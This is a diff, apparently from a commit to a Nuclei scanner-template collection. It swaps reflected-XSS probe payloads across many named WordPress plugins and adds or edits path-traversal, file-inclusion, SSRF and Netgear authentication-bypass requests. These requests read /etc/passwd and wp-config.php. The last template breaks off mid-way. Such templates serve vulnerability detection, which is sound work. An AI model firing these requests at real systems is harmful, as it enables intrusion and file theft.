||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
|
||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<ScrIpT>alert(123)</ScrIpT>"
|
||||
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</textarea></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000127
|
||||
|
||||
info:
|
||||
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
|
||||
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
|
||||
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2016-10956
|
|||
|
||||
info:
|
||||
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
author: daffainfo,0x240x23elu
|
||||
severity: high
|
||||
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
|
||||
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
|
||||
|
||||
body: "amty_hidden=1"
|
||||
|
||||
|
@ -21,7 +21,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -17,7 +17,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
|
||||
- "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=javascript:prompt(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-16059
|
||||
|
||||
info:
|
||||
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
||||
- https://www.exploit-db.com/exploits/45342
|
||||
tags: cve,cve2018,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
|
||||
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,11 +1,13 @@
|
|||
id: wp-wechat-broadcast-lfi
|
||||
id: CVE-2018-16283
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/45438
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
|
||||
- https://www.exploit-db.com/exploits/45438
|
||||
tags: cve,cve2018,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -2,7 +2,7 @@ id: CVE-2018-16299
|
|||
|
||||
info:
|
||||
name: WordPress Plugin Localize My Post 1.0 - LFI
|
||||
author: 0x_Akoko
|
||||
author: 0x_Akoko,0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/45439
|
||||
tags: wordpress,cve2018,cve,lfi
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -1,22 +1,46 @@
|
|||
id: CVE-2018-3760
|
||||
|
||||
info:
|
||||
name: Rails CVE-2018-3760
|
||||
author: 0xrudra
|
||||
name: Ruby On Rails Path Traversal
|
||||
author: 0xrudra,pikpikcu
|
||||
severity: high
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
|
||||
- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
|
||||
- https://seclists.org/oss-sec/2018/q2/210
|
||||
- https://xz.aliyun.com/t/2542
|
||||
description: |
|
||||
Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files.
|
||||
There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
|
||||
tags: cve,cve2018,rails,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
|
||||
- raw:
|
||||
- |
|
||||
GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Length: 94
|
||||
|
||||
- |
|
||||
GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: path
|
||||
internal: true
|
||||
part: body
|
||||
regex:
|
||||
- "/etc/passwd is no longer under a load path: (.*?),"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-7422
|
|||
|
||||
info:
|
||||
name: WordPress Site Editor Plugin LFI
|
||||
author: LuskaBol
|
||||
author: LuskaBol,0x240x23elu
|
||||
severity: high
|
||||
tags: cve,cve2018,wordpress,wp-plugin,lfi
|
||||
description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
|
||||
|
@ -12,8 +12,9 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
|
||||
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
@ -22,6 +23,7 @@ requests:
|
|||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -2,7 +2,7 @@ id: CVE-2019-15713
|
|||
|
||||
info:
|
||||
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
author: daffainfo,dhiyaneshDk
|
||||
severity: medium
|
||||
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
||||
reference: |
|
||||
|
@ -13,13 +13,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
|
||||
- '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -8,13 +8,15 @@ info:
|
|||
refrense: |
|
||||
- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
- https://github.com/igniterealtime/Openfire/pull/1497
|
||||
tags: cve,cve2019,ssrf
|
||||
tags: cve,cve2019,ssrf,openfire,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
|
||||
- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- <h1>Burp Collaborator Server</h1>
|
||||
- "http"
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'foo"><svg//onload="alert(123)">'
|
||||
- 'foo"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
|
||||
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src onerror=alert(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2020-27866
|
||||
|
||||
info:
|
||||
name: Netgear Authentication Bypass vulnerability
|
||||
author: gy741
|
||||
severity: high
|
||||
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
|
||||
tags: cve,cve2020,netgear,auth-bypass
|
||||
reference: |
|
||||
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
|
||||
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
